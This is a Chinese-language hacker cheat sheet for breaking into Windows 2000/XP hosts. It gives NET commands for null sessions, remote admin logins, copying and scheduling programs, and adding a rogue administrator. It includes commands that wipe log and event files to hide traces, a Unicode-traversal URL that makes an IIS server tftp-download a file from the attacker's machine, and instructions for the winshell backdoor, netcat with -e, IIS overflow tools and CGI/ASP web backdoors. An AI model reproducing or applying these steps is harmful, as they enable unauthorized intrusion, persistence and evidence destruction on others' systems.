經常使用的幾條NET命令:
(與遠程主機創建空管鏈接) net use \\IP地址\ipc$ "" /use:""
(以管理員身份登陸遠程主機) net use \\IP地址\ipc$ "密碼" /use:"Administrator"
(傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑\程序 \\IP地址\admin$
(查看遠程主機時間) net time \\IP地址
(定時啓動某個程序) at \\IP地址 02:18 readme.exe
(查看共享) net view \\IP地址
(查看netbios工做組列表) nbtstat -A IP地址
(將遠程主機C盤映射爲本身的F盤) net use f: \\IP地址\c$ ""/user:"Administrator"
(這兩條把本身增長到管理員組): net user 用戶名 密碼 /add
net localgroup Administrators 用戶名 /add
(斷開鏈接) net use \\IP地址\ipc$ /delete
掃尾:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
1、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啓動主機的「時間任務」服務:
netsvc schedule
\\IP
地址 /query
netsvc
\\IP
地址 schedule /start
2、OpenTelnet.exe
遠程啓動主機的Telnet服務,並綁定端口到7878,例如:
OpenTelnet
\\IP
地址 用戶名 密碼 1 7878
而後就能夠telnet到主機的7878端口,進入DOS方式下:
telnet IP地址 7878
3、winshell.exe
一個很是小的***(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>後,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (從新啓動機器)
d shutDown (關閉機器)
s Shell (執行後你就會看到可愛的「C:\>」)
x eXit (退出本次登陸會話,此命令並不終止winshell的運行)
4、3389登錄器,GUI方式登陸遠程主機的
5、elsave.exe
事件日誌清除工具
elsave -s
\\IP
地址 -l "application" -C
elsave -s
\\IP
地址 -l "system" -C
elsave -s
\\IP
地址 -l "security" -C
執行後成功清除應用程序日誌,系統日誌,
安全
日誌
6、hbulot.exe
開啓win2kserver和winxp的3389服務
hbulot [/r]
使用/r表示安裝完成後自動重起目標使設置生效。
7、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可作溢出後的鏈接用。
想要鏈接到某處: nc [-options] hostname port[s] [ports] ...
綁定端口等待鏈接: nc -l -p port [-options] [hostname] [port]
參數:
-e prog 程序重定向,一旦鏈接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站鏈接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可獲得更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用於掃描時
8、TFTPD32.EXE
把本身的電腦臨時變爲一臺FTP
服務器
,讓肉雞來下載文件,tftp命令要在肉雞上執行,一般要利用Unicode漏洞或telnet到肉雞,例如:
[url]http://IP[/url]
地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:\winnt\system32\文件名
而後能夠直接令文件運行:
9、prihack.exe是IIS的printer遠程緩衝區溢出工具
idqover.exe是溢出idq的,選擇「溢出後在一個端口監聽」,而後用telnet鏈接它的監聽端口,若是溢出成功,一連它的端口,綁定的命令立刻執行。xploit.exe是一個圖形界面的ida溢出,成功之後winxp下須要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。而後用IE瀏覽器鏈接。